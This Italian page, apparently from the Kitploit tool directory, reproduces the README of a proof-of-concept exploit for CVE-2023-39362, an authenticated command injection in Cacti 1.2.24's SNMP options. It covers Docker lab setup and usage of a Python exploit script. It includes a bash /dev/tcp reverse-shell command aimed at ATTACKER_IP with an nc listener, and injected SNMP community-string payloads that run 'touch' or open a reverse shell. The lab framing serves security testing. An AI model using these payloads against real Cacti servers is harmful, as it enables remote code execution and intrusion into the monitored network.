Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-39362-cacti-snmp-command-injection-poc | Kitploit
Strumenti/GitHubGitHub/jakabakos/cve-2023-39362-cacti-snmp-command-injection-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed TeamingLab e Pratica
GitHubjakabakos/cve-2023-39362-cacti-snmp-command-injection-poc

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-39362-cacti-snmp-command-injection-poc

Vedi Repository
22 anni faNon ancora revisionato

Vulnerabilità di command injection in Cacti (CVE-2023-39362) - PoC

Questo repository è un fork di questo repository: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application

Cacti è un framework open-source per il monitoraggio operativo e la gestione dei guasti, in continua evoluzione per soddisfare le esigenze dinamiche della sua comunità di utenti.

Nella versione 1.2.24 è stata identificata una potenziale vulnerabilità di sicurezza segnata come CVE-2023-39362. In condizioni specifiche, un utente privilegiato autenticato può sfruttare un difetto nelle opzioni SNMP di un Device, utilizzando una stringa maliziosa che porta a command injection. Questo sfruttamento comporta l'esecuzione autenticata di codice remoto sul server sottostante.

CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362

Le implicazioni di questa vulnerabilità sono gravi, poiché un attore malintenzionato con privilegi autenticati potrebbe compromettere l'integrità del server che ospita Cacti. Questa compromissione potrebbe potenzialmente fungere da porta di accesso non autorizzato ad altri host nella rete, in particolare quelli monitorati da Cacti.

Questa è un'applicazione vulnerabile per testare l'exploit per la vulnerabilità Cacti (CVE-2023-39362).

ATTENZIONE!

Questa applicazione contiene gravi vulnerabilità di sicurezza. Eseguila a tuo rischio! Si consiglia di utilizzare un ambiente con backup e isolato (come una VM con uno snapshot recente e rete solo host). Non caricare questa applicazione su server esposti a Internet, poiché verranno compromessi.

Esclusione di responsabilità

Non mi assumo la responsabilità del modo in cui chiunque utilizzi questa applicazione. L'unico scopo di questa applicazione è essere uno scenario di test per l'exploit CVE-2023-39362 e non dovrebbe essere utilizzata in modo malintenzionato. Se il tuo server viene compromesso tramite un'installazione di questa applicazione, non è mia responsabilità, ma è responsabilità della persona (o delle persone) che hanno caricato e installato l'applicazione.**

Utilizzo

1. Configurare l'ambiente

Ecco i passaggi per configurare l'ambiente:

  1. Lancia docker compose up -d per avviare la composizione.
  2. Puoi completare i passaggi visitando http://127.0.0.1/cacti per avviare la procedura guidata di inizializzazione di Cacti. Se ricevi un errore relativo al database, attendi qualche istante e aggiorna la pagina.
  3. Le credenziali predefinite sono admin/admin.
  4. Premi "Next" su tutti i pulsanti durante la procedura guidata, scegliendo le opzioni di conseguenza. Tutti i valori predefiniti dovrebbero andare bene e tutti i prerequisiti obbligatori dovrebbero essere soddisfatti.
  5. Dopo l'installazione, accedi come admin.
  6. Vai su "Console" > "Configuration" > "User".
  7. Fai clic sull'utente guest.
  8. Abilitalo ("Enable"), imposta una password e disattiva "Must Change Password at Next Login" se vuoi.
  9. Fai clic sul pulsante "Save".
  10. Vai alla sezione "Permissions".
  11. Sotto "General Administration", abilita "Console Access" e "Sites/Devices/Data".
  12. Fai clic sul pulsante "Save".
  13. Esci e accedi di nuovo come guest per provare l'exploit.

La guida ufficiale all'installazione di Cacti è disponibile qui.

Per smantellare l'ambiente usa il comando docker compose down.

2. Eseguire lo script di exploit

(Questo è solo uno dei possibili percorsi di sfruttamento)

Esegui il comando sul server remoto:

root@kitploit:~
python3 exploit.py --url http://localhost -u guest -p Sup3rS3cr3tPassword.1234 --cmd touch /tmp/proof

Aprire una reverse shell:

root@kitploit:~
nc -lvnp 4242

python3 exploit.py --url http://localhost -u guest -p Sup3rS3cr3tPassword.1234 --cmd 'bash -c "exec bash -i &>/dev/tcp/ATTACKER_IP/PORT <&1"'

3. Sfruttamento manuale

  1. Vai su "Console" > "Create" > "New Device".
  2. Crea un Device che supporti SNMP versione 1 o 2.
  3. Assicurati che il Device abbia Graphs con uno o più template di:
    • "Net-SNMP - Combined SCSI Disk Bytes"
    • "Net-SNMP - Combined SCSI Disk I/O"
    • (Creare il Device dal template "Net-SNMP Device" soddisfa il prerequisito dei Graphs)
  4. Nelle "SNMP Options", per il campo "SNMP Community String", usa un valore come questo: public\' ; touch /tmp/proof ; \'.
  5. Fai clic sul pulsante "Create".
  6. Controlla in /tmp la presenza del file creato.

Per ottenere una reverse shell, si può usare un payload come il seguente.

root@kitploit:~
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'

Causa principale

Un'analisi dettagliata della causa principale della vulnerabilità è disponibile nell'advisory di sicurezza originale o nel post del blog dell'autore originale.

Autori

  • Antonio Francesco Sardella - segnalatore della vulnerabilità - m3ssap0
  • Akos Jakab - automazione dello sfruttamento tramite uno script Python - jakabakos

Licenza

Questo progetto è concesso in licenza sotto la Unlicense - consulta il file LICENSE per i dettagli.

Scarica lo strumento